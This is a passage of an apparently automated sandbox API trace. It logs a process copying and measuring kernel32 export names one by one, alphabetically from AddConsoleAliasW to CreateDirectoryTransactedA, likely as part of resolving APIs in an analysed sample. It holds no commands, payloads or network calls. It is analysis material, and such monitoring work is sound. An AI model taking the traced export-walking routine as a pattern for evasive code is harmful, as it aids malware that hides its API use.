returned="AddConsoleAliasW" [0080.268] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.268] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.268] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.268] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.268] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.268] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.268] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.269] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.269] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.269] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.269] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.269] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.269] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.269] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.269] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.269] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.269] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.269] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.269] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.269] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.269] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.269] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.269] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.269] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.269] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.269] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.269] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.270] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.270] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.270] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.270] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.270] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.270] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.270] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.270] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.270] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.270] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.270] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.270] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.270] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.270] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.270] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.270] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.270] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.270] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.271] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.271] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.271] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.271] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.271] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.271] lstrlenA (lpString="BEEP") returned 4 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.271] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.271] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.271] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.271] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.271] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.271] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.271] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.271] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.271] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.271] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.271] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.271] lstrlenA (lpString="CANCELIO") returned 8 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.271] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.272] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.272] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.272] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.272] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.272] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.272] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.272] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.272] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.272] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.272] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.272] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.272] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.272] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.272] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.272] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.272] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.272] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.272] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.272] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.273] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.273] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.273] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.273] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.273] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.273] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.273] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.273] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.273] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.273] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.273] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.273] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.273] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.273] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.273] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.273] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.273] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.273] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.274] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.274] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.274] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.274] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.274] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.274] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.274] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.274] lstrlenA (lpString="COPYFILEA") returned 9 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.274] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.274] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.274] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.274] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.275] lstrlenA (lpString="COPYFILEW") returned 9 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.275] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.275] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.275] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.275] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.275] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.275] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.275] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.275] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.275] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.275] lstrlenA 